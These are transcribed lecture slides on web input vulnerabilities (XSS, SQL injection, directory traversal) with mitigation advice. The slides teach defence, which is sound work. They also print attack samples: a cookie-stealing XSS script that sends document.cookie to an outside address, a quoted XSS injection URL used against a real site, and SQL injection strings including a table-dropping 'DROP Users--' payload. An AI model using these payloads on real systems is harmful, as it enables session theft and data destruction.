Presentation is loading. Please wait.

Presentation is loading. Please wait.

Secure Software Engineering: Input Vulnerabilities

Published byJesse Moore Modified over 9 years ago

Similar presentations

Presentation on theme: "Secure Software Engineering: Input Vulnerabilities"— Presentation transcript:

1 Secure Software Engineering: Input Vulnerabilities
CPSC 410

2 Input Vulnerabilities
We all know not to run “code” retrieved from suspicious places But passive “data” may be interpreted as malicious instructions System.out.println(“/etc/password”); vs. File file = new File(“/etc/password”);

3 3 Most Common Input Vulnerabilities on Web
1. Cross-site Scripting 2. SQL Injection 3. Directory Traversal See - the Open Web App Security Project

4 Cross Site Scripting Web browsers should only execute JavaScript from sites that you visit But … Web sites often echo values given as input, e.g. Input: Output page: Hello Eric If we put JavaScript into an input, an output page could include that JavaScript! The tester must assume every data entry point is a possible XSS hole.

5 Example: Invectus on Macdonald’s
queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E queryText=”><img src=” height=”650″ width=”1000″> Source:

6

7 Malicious Script Input
Basic example (assume URL encoding) World”)</script> Steal user’s cookies <script type='text/javascript'> var img = document.createElement('img'); img.setAttribute('src', ‘ + escape(document.cookie)); document.body.appendChild(img); </script>

8 GWT vulnerabilities JavaScript on your host page that is unrelated to GWT Code you write that sets innerHTML on GWT Widget objects Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function) JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.) Src:

9 InnerHTML example <html> <head>
<script language="JavaScript"> function fillMyDiv(newContent) { document.getElementById('mydiv').innerHTML = newContent; } </script> </head> <body> <p>Some text before mydiv.</p> <div id="mydiv"></div> <p>Some text after mydiv.</p> </body> </html> newContent will be executed as the code for myDiv, and can contain arbitrary code like popups, etc.

10 GWT Guidelines Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code Carefully inspect any JavaScript strings you pass to GWT's JSON parser Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method Take care in your native JSNI methods to not do anything that would expose you to attacks

11 Cross Site Scripting

12 Famous Examples Obama website redirected to Hillary Clinton
Twitter Pop-Ups Invectus attacks (over 20 sites)

13 Best Solution Filter any data which is echo’d back to HTML e.g.
String input = request.getParameter(“data”); String clean = new HTMLInputFilter().filter( input );

14 Simple Web App A Web form that allows the user to look up account details Underneath – a Java Web application serving the requests

15 SQL Injection Example Happy-go-lucky SQL statement:
Leads to SQL injection One of the most common Web application vulnerabilities caused by lack of input validation But how? Typical way to construct a SQL query using string concatenation Looks benign on the surface But let’s play with it a bit more… String query = “SELECT Username, UserID, Password FROM Users WHERE username =“ + user + “ AND password =“ + password;

16 Injecting Malicious Data (1)
Press “Submit” query = “SELECT Username, UserID, Password FROM Users WHERE Username = 'bob' AND Password = ‘********‘”

17 Injecting Malicious Data (2)
Press “Submit” query = “SELECT Username, UserID, Password FROM Users WHERE Username = 'bob’-- ’ AND Password = ‘‘”

18 Injecting Malicious Data (3)
Press “Submit” query = “SELECT Username, UserID, Password FROM Users WHERE Username = 'bob’; DROP Users-- ’ AND Password = ‘‘”

19 Heart of the Issue: Tainted Input Data
SQL injections application database evil hacker Web App input evil input output browser May lead to vulnerabilities  insert validation in the application cross-site scripting Insert input checking!

20 Bobby Tables

21 Mitigating SQL Injection
Always use Prepared Statements or Stored Procedures Instead of: stmt.execute( "UPDATE EMPLOYEES SET SALARY = “+input1+“ WHERE ID = “ + input2 ); Use: PreparedStatement pstmt = conn.prepareStatement( "UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?“ pstmt.setBigDecimal(1, input1) pstmt.setInt(2, input2) The account used to make the database connection must have “Least privilege.” If the application only requires read access then the account must be given read access only. Avoid disclosing error information: Weak error handling is a great way for an attacker to profile SQL injection attacks. Uncaught SQL errors normally give too much information to the user and contain things like table names and procedure names.

22 ‘SQL’ injection on GWT More a vulnerability of the RPC services
Could send arbitrary data to your datastore (once the Javascript is de-obfuscated) Also possible to do JDOQL injection Use Query object and parameters instead of String syntax Query query = pm.newQuery(Employee.class); query.setFilter("lastName == lastNameParam"); query.setOrdering("hireDate desc"); query.declareParameters("String lastNameParam"); List<Employee> results = (List<Employee>) query.execute("Smith"); query.closeAll();

23 Recent Examples On March 27, 2011 mysql.com, the official homepage for MySQL, was compromised On June 1, 2011, LulzSec steal information from Sony PS3 users In August, 2011, Hacker Steals User Records From Nokia Developer Site

24 Directory/Path Traversal
Occurs when user input is used to create the path for reading a file on disk String file = request.getParameter(“photo”) new File(“/images/” + file); See

25 Directory Traversal Malicious input: Has been used to retrieve
Has been used to retrieve “web.xml” files Apache conf files UNIX password files Other example You let user choose between different style templates and save the template filename in their profile

26 Example 2 http://some_site.com.br/get-files.jsp?file=report.pdf
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. dir/some file dir/some file

27 Best Solution Don’t construct file paths from user input
Understand how your web server handles file access. Create a UUID (Universally Unique IDentifier) for each file and save as a column with data uuid = UUID.randomUUID().toString() File savedFile = File(uuid); Example database table for images picID picName picDesc picOwner picFormat uuid

28 2 Rules to Remember Always assume many users are malicious and want to break your software Don’t assume a Web site is always accessed through a normal Web Browser Famous last words, “I wrote the JavaScript so that this would never happen”

Download ppt "Secure Software Engineering: Input Vulnerabilities"

Similar presentations

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.

Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io

Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io
PHP Security.

PHP Security.
Prevent Cross-Site Scripting (XSS) attack

Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.

(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google